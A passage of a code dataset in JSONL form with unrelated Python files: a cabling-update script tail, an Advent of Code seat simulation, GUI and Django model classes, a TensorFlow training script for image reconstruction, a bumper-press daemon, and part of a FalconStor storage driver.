info, append data from cutsheet\n for indx,series in final_df.iterrows():\n try:\n new_cabling = jukebox.create_new_cable_info(args.device.strip(),series['a_interface'].strip(),series['z_hostname'].strip(),series['z_interface'].strip(),device_cabling)\n except:\n print(bcolors.FAIL,f'Error >> Could not add cabling info from cutsheet, exiting',bcolors.ENDC)\n \n #Update Jukebox\n try:\n jukebox.edit_jukebox_cabling(args.device,new_cabling)\n except:\n print(bcolors.FAIL,f\"Error >> Could not push cabling info from cutsheet for {args.device}\",bcolors.ENDC)\n sys.exit()\n \n print(bcolors.OKGREEN,f\"Info >> Updated JukeBox, please verify edits : https://jukebox-web.corp.amazon.com/#/pendingEdits\",bcolors.ENDC)\n\ndef main():\n args = parse_args()\n cabling_info(args)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"aws/vc_edit_cabling_jb.py","file_name":"vc_edit_cabling_jb.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"600322852","text":"import itertools\n\nOCCUPIED = \"#\"\nEMPTY = \"L\"\nFLOOR = \".\"\n\nDELTAS = [(dx, dy) for dx in range(-1,2) for dy in range(-1,2) if not dx==dy==0]\n\nwith open(\"input\") as file:\n data = tuple(line.strip() for line in file)\n\ndef p1_tick(data):\n height = len(data)\n width = len(data[0])\n\n rows = []\n for j in range(height):\n row = []\n for i in range(width):\n neighbors=[data[j+dy][i+dx] for dx,dy in DELTAS if 0 <= i+dx < width and 0 <= j+dy < height]\n\n state = data[j][i]\n if state == EMPTY and neighbors.count(OCCUPIED) == 0:\n row.append(OCCUPIED)\n elif state == OCCUPIED and neighbors.count(OCCUPIED) >= 4:\n row.append(EMPTY)\n else:\n row.append(state)\n rows.append(\"\".join(row))\n return tuple(rows)\n\nline_of_sight_neighbors = {}\nheight = len(data)\nwidth = len(data[0])\nfor j in range(height):\n for i in range(width):\n neighbors = []\n for dx, dy in DELTAS:\n for k in itertools.count(1):\n if not (0 <= i+k*dx < width and 0 <= j+k*dy < height):\n break\n if data[j+k*dy][i+k*dx] != FLOOR:\n neighbors.append((i+k*dx, j+k*dy))\n break\n line_of_sight_neighbors[i,j] = neighbors\n\ndef p2_tick(data):\n height = len(data)\n width = len(data[0])\n\n rows = []\n for j in range(height):\n row = []\n for i in range(width):\n neighbors=[data[y][x] for x,y in line_of_sight_neighbors[i,j]]\n\n state = data[j][i]\n if state == EMPTY and neighbors.count(OCCUPIED) == 0:\n row.append(OCCUPIED)\n elif state == OCCUPIED and neighbors.count(OCCUPIED) >= 5:\n row.append(EMPTY)\n else:\n row.append(state)\n rows.append(\"\".join(row))\n return tuple(rows)\n\n \noriginal_data = data\n\n#part 1\nwhile True:\n new_data = p1_tick(data)\n if new_data == data:\n break\n data = new_data\n\nprint(sum(row.count(OCCUPIED) for row in data))\n\n#part 2\ndata = original_data\nwhile True:\n new_data = p2_tick(data)\n if new_data == data:\n break\n data = new_data\n\nprint(sum(row.count(OCCUPIED) for row in data))","sub_path":"11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"208643734","text":"from PyQt5.QtCore import Qt\n\nfrom app.data.database import DB\n\nfrom app.extensions.custom_gui import DeletionDialog\nfrom app.editor.custom_widgets import PartyBox\nfrom app.editor.base_database_gui import DragDropCollectionModel\n\nfrom app.data import parties\nfrom app.utilities import str_utils\n\nclass PartyModel(DragDropCollectionModel):\n def data(self, index, role):\n if not index.isValid():\n return None\n if role == Qt.DisplayRole:\n party = self._data[index.row()]\n text = party.nid + \": \" + party.name\n return text\n return None\n\n def create_new(self):\n nids = [d.nid for d in self._data]\n nid = name = str_utils.get_next_name(\"New Party\", nids)\n new_party = parties.PartyPrefab(nid, name, DB.units[0].nid)\n DB.parties.append(new_party)\n return new_party\n\n def delete(self, idx):\n party = self._data[idx]\n nid = party.nid\n affected_levels = [level for level in DB.levels if level.party == nid]\n if affected_levels:\n from app.editor.global_editor.level_menu import LevelModel\n model = LevelModel\n msg = \"Deleting Party %s would affect this level\" % nid\n swap, ok = DeletionDialog.get_swap(affected_levels, model, msg, PartyBox(self.window, exclude=party), self.window)\n if ok:\n self.on_nid_changed(nid, swap.nid)\n else:\n return\n super().delete(idx)\n\n def on_nid_changed(self, old_nid, new_nid):\n # Levels can be effected\n for level in DB.levels:\n if level.party == old_nid:\n level.party = new_nid\n","sub_path":"app/editor/party_editor/party_model.py","file_name":"party_model.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"449352963","text":"from oscar.apps.promotions.models import * # noqa isort:skip\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.translation import pgettext_lazy\n\n\nclass Slide(AbstractPromotion):\n \"\"\"\n Slide promotion that is being displayed in revolution slider \n on home page\n \"\"\"\n _type = 'Slide'\n name = models.CharField(_(\"Name\"), max_length=128)\n header = models.CharField(_(\"Header\"), max_length=128, blank=True,\n null=True)\n subheader = models.CharField(_(\"SubHeader\"), max_length=128, blank=True,\n null=True)\n content = models.CharField(_(\"Content\"), max_length=256, blank=True,\n null=True)\n button_text = models.CharField(_(\"Button Text\"), max_length=128,\n blank=True, null=True)\n position = models.PositiveSmallIntegerField(_(\"Position\"), default=0)\n link_url = ExtendedURLField(\n _('Link URL'), blank=True,\n help_text=_('This is where this promotion links to'))\n image = models.ImageField(\n _('Image'), upload_to=settings.OSCAR_PROMOTION_FOLDER,\n max_length=255)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n app_label = 'promotions'\n verbose_name = _(\"Slide\")\n verbose_name_plural = _(\"Slides\")\n ordering = ['position',]\n\n\nclass Icon(AbstractPromotion):\n \"\"\"\n Icon with label displayed on home page\n \"\"\"\n _type = 'Icon' \n name = models.CharField(_(\"Name\"), max_length=128)\n header = models.CharField(_(\"Header\"), max_length=128, blank=True,\n null=True)\n subheader = models.CharField(_(\"SubHeader\"), max_length=128, blank=True,\n null=True)\n position = models.PositiveSmallIntegerField(_(\"Position\"), default=0)\n image = models.ImageField(\n _('Image'), upload_to=settings.OSCAR_PROMOTION_FOLDER,\n max_length=255)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n app_label = 'promotions'\n verbose_name = _(\"Icon\")\n verbose_name_plural = _(\"Icons\")\n ordering = ['position',]\n","sub_path":"promotions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"99945904","text":"from exorim import RIM, PhysicalModel\nfrom exorim.definitions import DTYPE, RIM_HPARAMS, MODEL_HPARAMS\nfrom exorim.datasets import NCompanions\nfrom exorim.models import Model, UnetModel\nfrom exorim.utils import residual_plot, plot_to_image\nfrom datetime import datetime\nimport os, time, json\nimport tensorflow as tf\nimport numpy as np\nfrom exorim.utils import nullwriter\n\n\ndef main(args):\n print(args)\n if args.seed is not None:\n tf.random.set_seed(args.seed)\n np.random.seed(args.seed)\n if args.json_override is not None:\n if isinstance(args.json_override, list):\n files = args.json_override\n else:\n files = [args.json_override, ]\n for file in files:\n with open(file, \"r\") as f:\n json_override = json.load(f)\n args_dict = vars(args)\n args_dict.update(json_override)\n\n phys = PhysicalModel(\n pixels=args.pixels,\n wavelength=args.wavelength,\n logim=True,\n oversampling_factor=args.oversampling_factor,\n chi_squared=args.chi_squared,\n plate_scale=args.plate_scale\n )\n\n train_dataset = NCompanions(\n phys=phys,\n total_items=args.total_items,\n batch_size=args.batch_size,\n width=args.width\n )\n if args.architecture == \"unet\":\n model = UnetModel(\n filters=args.filters,\n kernel_size=args.kernel_size,\n filter_scaling=args.filter_scaling,\n input_kernel_size=args.input_kernel_size,\n layers=args.layers,\n block_conv_layers=args.block_conv_layers,\n strides=args.strides,\n activation=args.activation,\n upsampling_interpolation=args.upsampling_interpolation\n )\n elif args.architecture == \"hourglass\":\n model = Model(\n filters=args.filters,\n kernel_size=args.kernel_size,\n filter_scaling=args.filter_scaling,\n input_kernel_size=args.input_kernel_size,\n layers=args.layers,\n block_conv_layers=args.block_conv_layers,\n strides=args.strides,\n activation=args.activation,\n upsampling_interpolation=args.upsampling_interpolation\n )\n else:\n raise ValueError(\"architecture parameters must be in ['hourglass', 'unet']\")\n\n rim = RIM(\n model=model,\n physical_model=phys,\n steps=args.steps,\n adam=True,\n )\n\n learning_rate_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate=args.initial_learning_rate,\n decay_rate=args.decay_rate,\n decay_steps=args.decay_steps,\n staircase=args.staircase\n )\n optim = tf.keras.optimizers.deserialize(\n {\n \"class_name\": args.optimizer,\n 'config': {\"learning_rate\": learning_rate_schedule}\n }\n )\n # weights for time steps in the loss function\n if args.time_weights == \"uniform\":\n wt = tf.ones(shape=(args.steps), dtype=DTYPE) / args.steps\n elif args.time_weights == \"linear\":\n wt = 2 * (tf.range(args.steps, dtype=DTYPE) + 1) / args.steps / (args.steps + 1)\n elif args.time_weights == \"quadratic\":\n wt = 6 * (tf.range(args.steps, dtype=DTYPE) + 1) ** 2 / args.steps / (args.steps + 1) / (2 * args.steps + 1)\n else:\n raise ValueError(\"time_weights must be in ['uniform', 'linear', 'quadratic']\")\n wt = wt[..., tf.newaxis] # [steps, batch]\n\n if args.residual_weights == \"uniform\":\n w = tf.keras.layers.Lambda(lambda s: tf.ones_like(s, dtype=DTYPE) / tf.cast(tf.math.reduce_prod(s.shape[1:]), DTYPE))\n elif args.residual_weights == \"linear\":\n w = tf.keras.layers.Lambda(lambda s: s / tf.reduce_sum(s, axis=(1, 2, 3), keepdims=True))\n elif args.residual_weights == \"quadratic\":\n w = tf.keras.layers.Lambda(lambda s: tf.square(s) / tf.reduce_sum(tf.square(s), axis=(1, 2, 3), keepdims=True))\n elif args.residual_weights == \"sqrt\":\n w = tf.keras.layers.Lambda(lambda s: tf.sqrt(s) / tf.reduce_sum(tf.sqrt(s), axis=(1, 2, 3), keepdims=True))\n else:\n raise ValueError(\"residual_weights must be in ['uniform', 'linear', 'quadratic', 'sqrt']\")\n\n # ==== Take care of where to write logs and stuff =================================================================\n if args.model_id.lower() != \"none\":\n if args.logname is not None:\n logname = args.model_id + \"_\" + args.logname\n model_id = args.model_id\n else:\n logname = args.model_id + \"_\" + datetime.now().strftime(\"%y-%m-%d_%H-%M-%S\")\n model_id = args.model_id\n elif args.logname is not None:\n logname = args.logname\n model_id = logname\n else:\n logname = args.logname_prefixe + \"_\" + datetime.now().strftime(\"%y-%m-%d_%H-%M-%S\")\n model_id = logname\n if args.logdir.lower() != \"none\":\n logdir = os.path.join(args.logdir, logname)\n if not os.path.isdir(logdir):\n os.mkdir(logdir)\n writer = tf.summary.create_file_writer(logdir)\n else:\n writer = nullwriter()\n # ===== Make sure directory and checkpoint manager are created to save model ===================================\n if args.model_dir.lower() != \"none\":\n checkpoints_dir = os.path.join(args.model_dir, logname)\n old_checkpoints_dir = os.path.join(args.model_dir, model_id) # in case they differ we load model from a different directory\n if not os.path.isdir(checkpoints_dir):\n os.mkdir(checkpoints_dir)\n with open(os.path.join(checkpoints_dir, \"script_params.json\"), \"w\") as f:\n json.dump(vars(args), f, indent=4)\n with open(os.path.join(checkpoints_dir, \"model_hparams.json\"), \"w\") as f:\n hparams_dict = {key: vars(args)[key] for key in MODEL_HPARAMS}\n json.dump(hparams_dict, f, indent=4)\n with open(os.path.join(checkpoints_dir, \"rim_hparams.json\"), \"w\") as f:\n hparams_dict = {key: vars(args)[key] for key in RIM_HPARAMS}\n json.dump(hparams_dict, f, indent=4)\n ckpt = tf.train.Checkpoint(step=tf.Variable(1), optimizer=optim, net=rim.model)\n checkpoint_manager = tf.train.CheckpointManager(ckpt, old_checkpoints_dir, max_to_keep=args.max_to_keep)\n save_checkpoint = True\n # ======= Load model if model_id is provided ===============================================================\n if args.model_id.lower() != \"none\":\n checkpoint_manager.checkpoint.restore(checkpoint_manager.latest_checkpoint)\n if old_checkpoints_dir != checkpoints_dir: # save progress in another directory.\n if args.reset_optimizer_states:\n optim = tf.keras.optimizers.deserialize(\n {\n \"class_name\": args.optimizer,\n 'config': {\"learning_rate\": learning_rate_schedule}\n }\n )\n ckpt = tf.train.Checkpoint(step=tf.Variable(1), optimizer=optim, net=rim.model)\n checkpoint_manager = tf.train.CheckpointManager(ckpt, checkpoints_dir, max_to_keep=args.max_to_keep)\n else:\n save_checkpoint = False\n\n # =================================================================================================================\n\n def train_step(X, Y, noise_rms):\n with tf.GradientTape() as tape:\n tape.watch(rim.model.trainable_variables)\n y_pred_series, chi_squared = rim.call(X, noise_rms, outer_tape=tape)\n # weighted mean over image residuals\n cost = tf.reduce_sum(w(Y) * tf.square(y_pred_series - rim.inverse_link_function(Y)), axis=(2, 3, 4))\n # weighted mean over time steps\n cost = tf.reduce_sum(wt * cost, axis=0)\n # final cost is mean over global batch size\n cost = tf.reduce_mean(cost)\n gradient = tape.gradient(cost, rim.model.trainable_variables)\n gradient = [tf.clip_by_norm(grad, 5.) for grad in gradient]\n optim.apply_gradients(zip(gradient, rim.model.trainable_variables))\n # Update metrics with \"converged\" score\n chi_squared = tf.reduce_mean(chi_squared[-1])\n return cost, chi_squared\n\n # ====== Training loop ============================================================================================\n time_per_step = tf.metrics.Mean()\n epoch_loss = tf.metrics.Mean()\n epoch_chi_squared = tf.metrics.Mean()\n history = { # recorded at the end of an epoch only\n \"train_chi_squared\": [],\n \"train_cost\": [],\n \"learning_rate\": [],\n \"time_per_step\": [],\n \"step\": [],\n \"wall_time\": []\n }\n best_loss = np.inf\n patience = args.patience\n step = 0\n global_start = time.time()\n estimated_time_for_epoch = 0\n out_of_time = False\n lastest_checkpoint = 1\n for epoch in range(args.epochs):\n if (time.time() - global_start) > args.max_time * 3600 - estimated_time_for_epoch:\n break\n epoch_start = time.time()\n epoch_loss.reset_states()\n epoch_chi_squared.reset_states()\n time_per_step.reset_states()\n with writer.as_default():\n for batch, (X, Y, noise_rms) in enumerate(train_dataset):\n start = time.time()\n cost, chi_squared = train_step(X, Y, noise_rms)\n # ========== Summary and logs =========================================================================\n _time = time.time() - start\n time_per_step.update_state([_time])\n epoch_loss.update_state([cost])\n epoch_chi_squared.update_state([chi_squared])\n step += 1\n # last batch we make a summary of residuals\n if args.n_residuals > 0:\n tf.summary.image(f\"Residuals\",\n plot_to_image(\n residual_plot(\n train_dataset,\n rim,\n args.n_residuals\n )), step=step)\n\n train_cost = epoch_loss.result().numpy()\n train_chi_sq = epoch_chi_squared.result().numpy()\n tf.summary.scalar(\"Time per step\", time_per_step.result(), step=step)\n tf.summary.scalar(\"Chi Squared\", train_chi_sq, step=step)\n tf.summary.scalar(\"MSE\", train_cost, step=step)\n tf.summary.scalar(\"Learning Rate\", optim.lr(step), step=step)\n print(f\"epoch {epoch} | train loss {train_cost:.3e} \"\n f\"| lr {optim.lr(step).numpy():.2e} | time per step {time_per_step.result().numpy():.2e} s\"\n f\"| chi sq {train_chi_sq:.2e}\")\n history[\"train_cost\"].append(train_cost)\n history[\"learning_rate\"].append(optim.lr(step).numpy())\n history[\"train_chi_squared\"].append(train_chi_sq)\n history[\"time_per_step\"].append(time_per_step.result().numpy())\n history[\"step\"].append(step)\n history[\"wall_time\"].append(time.time() - global_start)\n\n cost = train_cost\n if np.isnan(cost):\n print(\"Training broke the Universe\")\n break\n if cost < (1 - args.tolerance) * best_loss:\n best_loss = cost\n patience = args.patience\n else:\n patience -= 1\n if (time.time() - global_start) > args.max_time * 3600:\n out_of_time = True\n if save_checkpoint:\n checkpoint_manager.checkpoint.step.assign_add(1) # a bit of a hack\n if epoch % args.checkpoints == 0 or patience == 0 or epoch == args.epochs - 1 or out_of_time:\n with open(os.path.join(checkpoints_dir, \"score_sheet.txt\"), mode=\"a\") as f:\n np.savetxt(f, np.array([[lastest_checkpoint, cost]]))\n lastest_checkpoint += 1\n checkpoint_manager.save()\n print(\"Saved checkpoint for step {}: {}\".format(int(checkpoint_manager.checkpoint.step), checkpoint_manager.latest_checkpoint))\n if patience == 0:\n print(\"Reached patience\")\n break\n if out_of_time:\n break\n if epoch > 0:\n estimated_time_for_epoch = time.time() - epoch_start\n if optim.lr(step).numpy() < 1e-8:\n print(\"Reached learning rate limit\")\n break\n print(f\"Finished training after {(time.time() - global_start) / 3600:.3f} hours.\")\n return history, best_loss\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n parser = ArgumentParser()\n parser.add_argument(\"--model_id\", default=\"None\", help=\"Start from this model id checkpoint. None means start from scratch\")\n parser.add_argument(\"--architecture\", default=\"unet\", help=\"Argument must be one of ['hourglass', 'unet']\")\n\n # Binary dataset parameters\n parser.add_argument(\"--total_items\", default=10, type=int, help=\"Total items in an epoch\")\n parser.add_argument(\"--batch_size\", default=1, type=int)\n parser.add_argument(\"--width\", default=2, type=float, help=\"Sigma parameter of super-gaussian in pixel units\")\n\n # Physical Model parameters\n parser.add_argument(\"--wavelength\", default=3.8e-6, type=float, help=\"Wavelength in meters\")\n parser.add_argument(\"--oversampling_factor\", default=None, type=float, help=\"Set the pixels size = resolution / oversampling_factor. Resolution is set by Michelson criteria\")\n parser.add_argument(\"--chi_squared\", default=\"append_visibility_amplitude_closure_phase\", help=\"One of 'visibility' or 'append_visibility_amplitude_closure_phase'. Default is the latter.\")\n parser.add_argument(\"--pixels\", default=128, type=int)\n parser.add_argument(\"--redundant\", action=\"store_true\", help=\"Whether to use redundant closure phase in likelihood or not\")\n parser.add_argument(\"--plate_scale\", default=5, type=float, help=\"Size of a pixel, in mas\")\n parser.add_argument(\"--beta\", default=1, type=float, help=\"Lagrange multiplier for the closure phase term.\")\n\n # RIM hyper parameters\n parser.add_argument(\"--steps\", default=6, type=int, help=\"Number of recurrent steps in the model\")\n\n # Neural network hyper parameters\n parser.add_argument(\"--filters\", default=32, type=int)\n parser.add_argument(\"--filter_scaling\", default=2, type=float)\n parser.add_argument(\"--kernel_size\", default=3, type=int)\n parser.add_argument(\"--layers\", default=2, type=int)\n parser.add_argument(\"--block_conv_layers\", default=2, type=int)\n parser.add_argument(\"--strides\", default=2, type=int)\n parser.add_argument(\"--input_kernel_size\", default=7, type=int)\n parser.add_argument(\"--upsampling_interpolation\", action=\"store_true\")\n parser.add_argument(\"--activation\", default=\"tanh\")\n parser.add_argument(\"--initializer\", default=\"glorot_normal\")\n\n # Optimization params\n parser.add_argument(\"--epochs\", default=10, type=int, help=\"Number of epochs for training.\")\n parser.add_argument(\"--optimizer\", default=\"Adamax\", help=\"Class name of the optimizer (e.g. 'Adam' or 'Adamax')\")\n parser.add_argument(\"--initial_learning_rate\", default=1e-4, type=float, help=\"Initial learning rate.\")\n parser.add_argument(\"--decay_rate\", default=1., type=float, help=\"Exponential decay rate of learning rate (1=no decay).\")\n parser.add_argument(\"--decay_steps\", default=1000, type=int, help=\"Decay steps of exponential decay of the learning rate.\")\n parser.add_argument(\"--staircase\", action=\"store_true\", help=\"Learning rate schedule only change after decay steps if enabled.\")\n parser.add_argument(\"--patience\", default=np.inf, type=int, help=\"Number of step at which training is stopped if no improvement is recorder.\")\n parser.add_argument(\"--tolerance\", default=0, type=float, help=\"Current score <= (1 - tolerance) * best score => reset patience, else reduce patience.\")\n parser.add_argument(\"--track_train\", action=\"store_true\", help=\"Track training metric instead of validation metric, in case we want to overfit\")\n parser.add_argument(\"--max_time\", default=np.inf, type=float, help=\"Time allowed for the training, in hours.\")\n parser.add_argument(\"--time_weights\", default=\"uniform\", help=\"uniform: w_t=1 for all t, linear: w_t~t, quadratic: w_t~t^2\")\n parser.add_argument(\"--reset_optimizer_states\", action=\"store_true\", help=\"When training from pre-trained weights, reset states of optimizer.\")\n parser.add_argument(\"--residual_weights\", default=\"sqrt\", help=\"Options are ['uniform', 'linear', 'quadratic', 'sqrt']\")\n\n # logs\n parser.add_argument(\"--logdir\", default=\"None\", help=\"Path of logs directory. Default if None, no logs recorded.\")\n parser.add_argument(\"--model_dir\", default=\"None\", help=\"Path to the directory where to save models checkpoints.\")\n parser.add_argument(\"--logname\", default=None, help=\"Overwrite name of the log with this argument\")\n parser.add_argument(\"--logname_prefixe\", default=\"RIM\", help=\"If name of the log is not provided, this prefix is prepended to the date\")\n parser.add_argument(\"--checkpoints\", default=10, type=int, help=\"Save a checkpoint of the models each {%} iteration.\")\n parser.add_argument(\"--max_to_keep\", default=3, type=int, help=\"Max model checkpoint to keep.\")\n parser.add_argument(\"--n_residuals\", default=2, type=int, help=\"Number of residual plots to save. Add overhead at the end of an epoch only. Should be >= 2.\")\n\n # Reproducibility params\n parser.add_argument(\"--seed\", default=42, type=int, help=\"Random seed for numpy and tensorflow.\")\n parser.add_argument(\"--json_override\", default=None, nargs=\"+\", help=\"A json filepath that will override every command line parameters. Useful for reproducibility\")\n args = parser.parse_args()\n main(args)\n","sub_path":"scripts/train_rim_on_n_companions.py","file_name":"train_rim_on_n_companions.py","file_ext":"py","file_size_in_byte":18953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"434061522","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# bumper-reader.py\n#\n# Copyright (C) 2014 HES-SO//HEG Arc\n#\n# Author(s): Cédric Gaspoz \n#\n# This file is part of Wheel.\n#\n# Wheel is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Wheel is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Wheel. If not, see .\n\n#standard python libs\nimport logging\nimport time\nimport requests\nfrom evdev import InputDevice, ecodes, list_devices, categorize\n\nlogging.basicConfig()\n\nAPI_URL = 'http://192.168.1.1/game/api/bumper'\n\nwhile True:\n logging.info(\"Getting the device...\")\n dev = InputDevice('/dev/input/event2')\n\n if dev:\n logging.info(\"We got the device...\")\n dev.grab()\n logging.info(\"Starting the Bumper Reader daemon...\")\n while True:\n try:\n for event in dev.read_loop():\n if event.type == ecodes.EV_KEY:\n data = categorize(event)\n if data.keystate == 1:\n # Bumper pressed\n url = API_URL\n r = requests.get(url)\n except IOError:\n logging.error(\"IOError\")\n break\n time.sleep(2)\n\nlogging.info(\"Terminating the Bumper Reader daemon...\")\n","sub_path":"daemons/bumper-daemon.py","file_name":"bumper-daemon.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"601687982","text":"# Copyright (c) 2016 FalconStor, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport base64\nimport json\nimport random\nimport time\nimport uuid\n\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\nfrom oslo_utils import units\nfrom six.moves import http_client\n\nfrom cinder import exception\nfrom cinder.i18n import _, _LI, _LW\n\n\nFSS_BATCH = 'batch'\nFSS_PHYSICALRESOURCE = 'physicalresource'\nFSS_PHYSICALADAPTER = 'physicaladapter'\nFSS_FCCLIENTINITIATORS = 'fcclientinitiators'\nFSS_FC_TGT_WWPN = 'fctgtwwpn'\nFSS_STORAGE_POOL = 'storagepool'\nFSS_LOGICALRESOURCE = 'logicalresource'\nFSS_SAN = 'sanresource'\nFSS_MIRROR = 'mirror'\nFSS_TIMEMARKPOLICY = 'timemarkpolicy'\nFSS_TIMEMARK = 'timemark'\nFSS_TIMEVIEW = 'timeview'\nFSS_SNAPSHOT_RESOURCE = 'snapshotresource'\nFSS_SNAPSHOT_GROUP = 'snapshotgroup'\nFSS_CLIENT = 'client'\nFSS_SANCLIENT = 'sanclient'\nFSS_ISCSI_TARGET = 'iscsitarget'\nFSS_ISCSI_CLIENT_INITIATORS = 'iscsiclientinitiators'\nFSS_SERVER = 'server'\nFSS_OPTIONS = 'options'\nFSS_PORTAL = 'defaultiscsiportal'\nFSS_PROPERTIES = 'properties'\nFSS_HOST = 'host'\nFSS_RETURN_CODE = 'rcs'\nFSS_AUTH = 'auth'\nFSS_LOGIN = 'login'\nFSS_SINGLE_TYPE = 'single'\n\n\nPOST = 'POST'\nGET = 'GET'\nPUT = 'PUT'\nDELETE = 'DELETE'\nGROUP_PREFIX = 'OpenStack-'\nPRODUCT_NAME = 'ipstor'\nSESSION_COOKIE_NAME = 'session_id'\nRETRY_LIST = ['107', '2147680512']\n\nMAXSNAPSHOTS = 1000\nOPERATION_TIMEOUT = 60 * 60\nRETRY_CNT = 5\nRETRY_INTERVAL = 15\n\nLOG = logging.getLogger(__name__)\n\n\nclass RESTProxy(object):\n def __init__(self, config):\n self.fss_host = config.san_ip\n self.fss_username = config.san_login\n self.fss_password = config.san_password\n self.fss_defined_pool = config.fss_pool\n if config.additional_retry_list:\n RETRY_LIST.append(config.additional_retry_list)\n\n self.FSS = FSSRestCommon(\n host=self.fss_host,\n username=self.fss_username,\n password=self.fss_password,\n fss_debug=config.fss_debug)\n self.session_id = None\n\n # naming\n def _get_vol_name_from_snap(self, snapshot):\n \"\"\"Return the name of the snapshot that FSS will use.\"\"\"\n return \"cinder-%s\" % snapshot[\"volume_id\"]\n\n def _get_fss_volume_name(self, volume):\n \"\"\"Return the name of the volume FSS will use.\"\"\"\n return \"cinder-%s\" % volume[\"id\"]\n\n def _get_group_name_from_id(self, id):\n return \"cinder-consisgroup-%s\" % id\n\n def _encode_name(self, name):\n uuid_str = name.replace(\"-\", \"\")\n vol_uuid = uuid.UUID('urn:uuid:%s' % uuid_str)\n newuuid = (base64.urlsafe_b64encode(vol_uuid.bytes).\n decode('utf-8').strip('='))\n return \"cinder-%s\" % newuuid\n\n def do_setup(self):\n self.session_id = self.FSS.fss_login()\n\n def _convert_size_to_gb(self, size):\n s = round(float(size) / units.Gi, 2)\n if s > 0:\n return s\n else:\n return 0\n\n def _convert_size_to_mb(self, size):\n return size * units.Ki\n\n def _get_pools_info(self):\n qpools = []\n poolinfo = {}\n try:\n output = self.list_pool_info()\n if \"storagepools\" in output['data']:\n for item in output['data']['storagepools']:\n if item['name'].startswith(GROUP_PREFIX) and (\n self.fss_defined_pool == item['id']):\n poolid = int(item['id'])\n qpools.append(poolid)\n break\n\n if not qpools:\n msg = _('The storage pool information is empty or not correct')\n raise exception.DriverNotInitialized(msg)\n\n # Query pool detail information\n for poolid in qpools:\n output = self.list_pool_info(poolid)\n poolinfo['pool_name'] = output['data']['name']\n poolinfo['total_capacity_gb'] = (\n self._convert_size_to_gb(output['data']['size']))\n poolinfo['used_gb'] = (\n self._convert_size_to_gb(output['data']['used']))\n poolinfo['QoS_support'] = False\n poolinfo['reserved_percentage'] = 0\n except Exception:\n msg = (_('Unexpected exception during get pools info.'))\n LOG.exception(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n return poolinfo\n\n def list_pool_info(self, pool_id=None):\n return self.FSS.list_pool_info(pool_id)\n\n def list_physicaladapter_info(self, adapter_id=None):\n return self.FSS.list_physicaladapter_info(adapter_id)\n\n def _checking_adapter_type(self, id):\n adapter_type = ''\n output = self.list_physicaladapter_info()\n if \"physicaladapters\" in output['data']:\n physicaladapters = output['data']['physicaladapters']\n if physicaladapters['id'] == id:\n adapter_type = physicaladapters['type']\n return adapter_type\n\n def create_vdev(self, volume):\n sizemb = self._convert_size_to_mb(volume[\"size\"])\n volume_name = self._get_fss_volume_name(volume)\n params = dict(storagepoolid=self.fss_defined_pool,\n category=\"virtual\",\n sizemb=sizemb,\n name=volume_name)\n return volume_name, self.FSS.create_vdev(params)\n\n def create_tv_from_cdp_tag(self, volume_metadata, volume):\n tv_vid = ''\n cdp_tag = ''\n\n if 'cdptag' in volume_metadata:\n tv_vid = str(volume_metadata['timeview']) + '_0'\n cdp_tag = str(volume_metadata['cdptag'])\n\n if 'rawtimestamp' in volume_metadata:\n tv_vid = '{0}_{1}'.format(str(volume_metadata['timeview']),\n str(volume_metadata['rawtimestamp']))\n volume_name = self._get_fss_volume_name(volume)\n sizemb = self._convert_size_to_mb(volume['size'])\n params = dict(name=volume_name,\n storage=dict(storagepoolid=self.fss_defined_pool,\n sizemb=sizemb),\n automaticexpansion=dict(enabled=False),\n timeviewcopy=True)\n if cdp_tag:\n params.update(cdpjournaltag=cdp_tag)\n\n metadata = self.FSS.create_timeview(tv_vid, params)\n return volume_name, metadata\n\n def create_thin_vdev(self, volume_metadata, volume):\n thin_size = 0\n size = volume[\"size\"]\n sizemb = self._convert_size_to_mb(size)\n params = dict(storagepoolid=self.fss_defined_pool,\n category=\"virtual\")\n\n if 'thinprovisioned' in volume_metadata:\n if volume_metadata['thinprovisioned'] is False:\n msg = (_('If you want to create a thin provisioning volume,'\n ' this param must be True.'))\n raise exception.VolumeBackendAPIException(msg)\n\n if 'thinsize' in volume_metadata:\n thin_size = int(volume_metadata['thinsize'])\n\n if size < 10:\n msg = _('The resource is a FSS thin device, minimum size is '\n '10240 MB.')\n raise exception.VolumeBackendAPIException(msg)\n else:\n try:\n if thin_size > size:\n msg = _('The allocated size must less than total size.')\n raise 